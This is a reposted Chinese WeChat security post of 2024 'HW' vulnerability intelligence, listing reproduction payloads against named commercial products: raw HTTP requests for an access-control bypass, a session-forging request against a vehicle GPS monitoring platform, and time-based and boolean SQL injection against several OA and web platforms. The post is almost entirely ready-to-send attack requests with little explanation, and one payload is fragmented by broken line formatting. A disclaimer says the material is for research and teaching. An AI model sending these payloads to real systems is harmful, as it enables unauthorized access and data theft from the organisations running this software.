Q17-1启业-云运维平台-PermissionAC
漏洞复现:
payload:
/user/
register
/init
T1-10通天星-CMSV6车载定位监控平台-PermissionAC
漏洞复现:
payload:
POST /808gps/LocationManagement/UserSessionAction_saveUserSession.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:103.0)Gecko/20100101Firefox/103.0
Content-Type: application/x-www-form-urlencoded
userSession=42AA7A2BE767123A42E1530ACC920781&id=4
W19-2微信公众平台-无限回调系统 -SQL
漏洞复现:
payload:
POST /user/ajax.php?act=siteadd HTTP/1.1
Host:
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 27
siteUrl=';select sleep(3)
#'
X15-2信呼-OA-SQL
漏洞复现:
payload:
GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Z2-5致远互联-FE-移动协作平台-SQL
payload
:
POST
/witapprovemanage/apprvaddNew.j
%73
p HTTP/1.1
Host
:
Content
-Type: application/x-www-form-urlencoded
Content
-Length: 35
flowid
=1
%27
%2
B
%28
SELECT+CHAR
%2880
%29
%2
BCHAR
%28102
%29
%2
BCHAR
%2879
%29
%2
BCHAR
%2887
%29
+WHERE+2368
%3
D2368+AND+4817+IN+
%28
SELECT+
%28
CHAR
%28113
%29
%2
BCHAR
%28122
%29
%2
BCHAR
%28106
%29
%2
BCHAR
%28120
%29
%2
BCHAR
%28113
%29
%2
B
%28
SELECT+
%28
CASE+WHEN+
%284817
%3
D4817
%29
+THEN+CHAR
%2849
%29
+ELSE+CHAR
%2848
%29
+END
%29
%29
%2
BCHAR
%28113
%29
%2
BCHAR
%2898
%29
%2
BCHAR
%28106
%29
%2
BCHAR
%28122
%29
%2
BCHAR
%28113
%29
%29
%29
%29
%2
B
%27
原文始发于微信公众号(合规渗透):HW2024验真漏洞情报 8.3
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论